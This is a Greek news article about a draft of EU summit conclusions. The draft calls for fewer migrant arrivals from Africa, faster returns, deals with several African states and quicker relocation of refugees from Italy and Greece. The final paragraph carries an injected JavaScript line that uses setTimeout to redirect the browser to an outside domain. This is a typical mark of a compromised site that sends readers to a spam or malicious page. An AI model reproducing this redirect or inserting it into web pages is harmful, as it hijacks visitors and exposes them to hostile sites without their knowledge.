Το προσχέδιο της Συνόδου: «Περισσότερες προσπάθειες» για να μειωθούν οι αφίξεις μεταναστών

0
3

 

«Περισσότερες προσπάθειες» για να μειωθούν οι αφίξεις και να επιταχυνθούν οι επαναπατρισμοί μεταναστών από χώρες της Αφρικής αναμένεται να ζητήσουν οι ηγέτες των 28 κρατών – μελών της Ε.Ε., σύμφωνα με το προσχέδιο των συμπερασμάτων της Συνόδου Κορυφής. Βάσει του προσχεδίου και σύμφωνα με το Γαλλικό Πρακτορείο, η Ε.Ε. θα επιδιώξει τη σύναψη συμφωνιών με αφρικανικές κυβερνήσεις, και κυρίως με τον Νίγηρα, τη Νιγηρία, την Αιθιοπία, το Μαλί και τη Σενεγάλη.

Η επικεφαλής της διπλωματίας της Ε.Ε. Φεντερίκα Μογκερίνι παρουσίασε στους ηγέτες των 28 έναν πρώτο απολογισμό των προετοιμασιών για τις συμφωνίες αυτές, κρίνοντας πως έχει ήδη υπάρξει «περισσότερη πρόοδος μέσα στους τελευταίους μήνες απ’ ό,τι τα τελευταία χρόνια».

Σύμφωνα με το προσχέδιο των συμπερασμάτων της Συνόδου Κορυφής, οι ηγέτες θέλουν από την κα Μογκερίνι να τους παρουσιάσει στο επόμενο Ευρωπαϊκό Συμβούλιο, τον Δεκέμβριο, «τα πρώτα αποτελέσματα που επιτεύχθηκαν σε όρους αφίξεων και επαναπατρισμών».

«Απαιτούνται περισσότερες προσπάθειες για να μειωθεί ο αριθμός των παράτυπων μεταναστών, ιδιαίτερα από την Αφρική, και να βελτιωθεί ο δείκτης των επιστροφών τους στις πατρίδες τους», σύμφωνα με το κείμενο του προσχεδίου.
Για τον σκοπό αυτό μπορούν να χρησιμοποιηθούν ως μοχλοί όλα τα «όργανα και τα κατάλληλα εργαλεία» σε ευρωπαϊκό επίπεδο, συμπεριλαμβανομένων πρωτοβουλιών για «την ανάπτυξη και το εμπόριο», αναφέρεται ακόμη στο κείμενο.

Κατά την κα Μογκερίνι, οι συμφωνίες αυτές θα είναι «αμοιβαία επωφελείς» για την Ε.Ε. και τα αφρικανικά κράτη, συμβάλλοντας ιδίως να δημιουργηθούν προοπτικές απασχόλησης για τους πολίτες τους και να αποφευχθεί το ενδεχόμενο η μετανάστευση να αποτελεί τη μοναδική τους προοπτική.

Οι συμφωνίες αυτές αναμένεται να είναι «έτοιμες» προς υπογραφή πριν από την άνοιξη, την περίοδο που ξαναρχίσουν οι επικίνδυνες προσπάθειες διάπλου της Μεσογείου μετά το χειμώνα, σημείωσε ένας ευρωπαίος αξιωματούχος.
Στα συμπεράσματα της Συνόδου Κορυφής αναμένεται επίσης να συμπεριληφθεί η έκκληση προς τα κράτη – μέλη να «εντείνουν τις προσπάθειές τους για να επιταχυνθούν οι μετεγκαταστάσεις» των προσφύγων από την Ιταλία και την Ελλάδα σε άλλες χώρες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here